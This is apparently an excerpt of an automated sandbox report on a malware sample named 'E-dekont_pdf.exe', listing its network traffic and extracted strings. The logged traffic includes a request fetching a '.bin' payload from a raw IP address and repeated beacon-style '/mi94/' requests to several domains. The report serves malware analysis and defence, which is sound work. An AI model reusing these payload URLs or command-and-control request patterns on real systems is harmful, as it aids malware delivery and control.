      Source: global trafficHTTP traffic detected: GET /mi94/?2dCtIp=8pAXjvKhwP&7n-Lh=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV HTTP/1.1Host: www.furniture-61686.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?2dCtIp=8pAXjvKhwP&7n-Lh=DPf7iOV4tZbGC7wAZwygpODOxt/Orl+HPYO0G2nQwomd4kRyfSlRFlrSB1ttg/LMfS7c HTTP/1.1Host: www.hunterboots--canada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&2dCtIp=8pAXjvKhwP HTTP/1.1Host: www.textare.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 185.53.179.90 185.53.179.90
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 34.138.169.8Cache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 17 Apr 2023 06:58:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 30 0d 0a 0d 0a Data Ascii: 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Mon, 17 Apr 2023 06:58:55 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 17 Apr 2023 06:59:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Apr 2023 06:59:36 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 290Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 65 61 6c 74 68 69 6e 73 75 72 61 6e 63 65 61 72 65 6e 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.healthinsurancearena.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 17 Apr 2023 07:00:38 GMTContent-Type: text/htmlContent-Length: 291ETag: "643cc32a-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 17 Apr 2023 07:02:00 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 17 Apr 2023 07:02:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 17 Apr 2023 07:04:06 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Apr 2023 07:04:44 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: zenid=9js4ns7i3tgo0srjnr1jmubgo2; path=/; domain=.www.hunterboots--canada.com; secure; HttpOnlyUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 31 65 63 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 4a 77 49 4e 4b 39 48 47 50 37 62 72 41 6a 46 55 75 75 79 34 6c 62 6c 44 62 73 45 47 75 7a 55 47 62 63 47 6e 64 74 68 32 63 59 22 20 2f 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 3a 20 48 75 6e 74 65 72 20 42 6f 6f 74 73 20 43 61 6e 61 64 61 20 2d 20 53 68 6f 70 20 52 61 69 6e 62 6f 6f 74 73 20 57 69 74 68 20 46 72 65 65 20 53 68 69 70 70 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 20 0d 0a 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 6d 65 6e 20 4d 65 6e 20 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 75 6e 74 65 72 20 42 6f 6f 74 73 20 43 61 6e 61 64 61 20 2d 20 53 68 6f 70 20 52 61 69 6e 62 6f 6f 74 73 20 57 69 74 68 20 46 72 65 65 20 53 68 69 70 70 69 6e 67 20 3a 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 57 6f 6d 65 6e 20 4d 65 6e 20 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0d 0a 0d 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 Data Ascii: 1ec1<!DOCTYPE html PUBLIC "-//W3
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 17 Apr 2023 07:05:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 345X-Sorting-Hat-ShopId: 67998253344X-Dc: gcp-europe-west3X-Request-ID: 1d5660a7-c37d-450e-9f58-618507675fffX-Download-Options: noopenX-XSS-Protection: 1; mode=blockX-Permitted-Cross-Domain-Policies: noneX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sO%2FzBjPzSilwTW%2BL8awMETuZ4eJZlqetDZOMxojQEPocv0oixU3PvyScW9f9HvCInLc4zHyem0AIM8njK4nJAVb8jRn11%2FT%2FHQphPd7gUodvgFZjNbuCgqmi5%2BkD0oNE%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=16.999960Server: cloudflareCF-RAY: 7b92d14e9afbbbe5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: unknownTCP traffic detected without corresponding DNS query: 34.138.169.8
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: E-dekont_pdf.exe, 00000001.00000000.76509619647.000000000040A000.00000008.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000004.00000000.76878192409.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: E-dekont_pdf.exe, 00000004.00000001.76878880686.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: E-dekont_pdf.exe, 00000004.00000001.76878880686.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownDNS traffic detected: queries for: www.guesstheword.net
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 34.138.169.8Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=0CB5zMamgLSa2Qk9G/m2rdJQK8/LiOrSmHcqlOKoi6nqM+OhtDcAk7yr1mTtKwqhUShE&7nrLOp=h2JXJD HTTP/1.1Host: www.guesstheword.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=o1w78JSdLhQJpd//cz6vuhCEWxwCs3ZFLfqzER3yERbZr4xPYmZ3WvYQtDeAGIhYcEOX&7nrLOp=h2JXJD HTTP/1.1Host: www.canadianbreederprogram.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV&7nrLOp=h2JXJD HTTP/1.1Host: www.furniture-61686.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
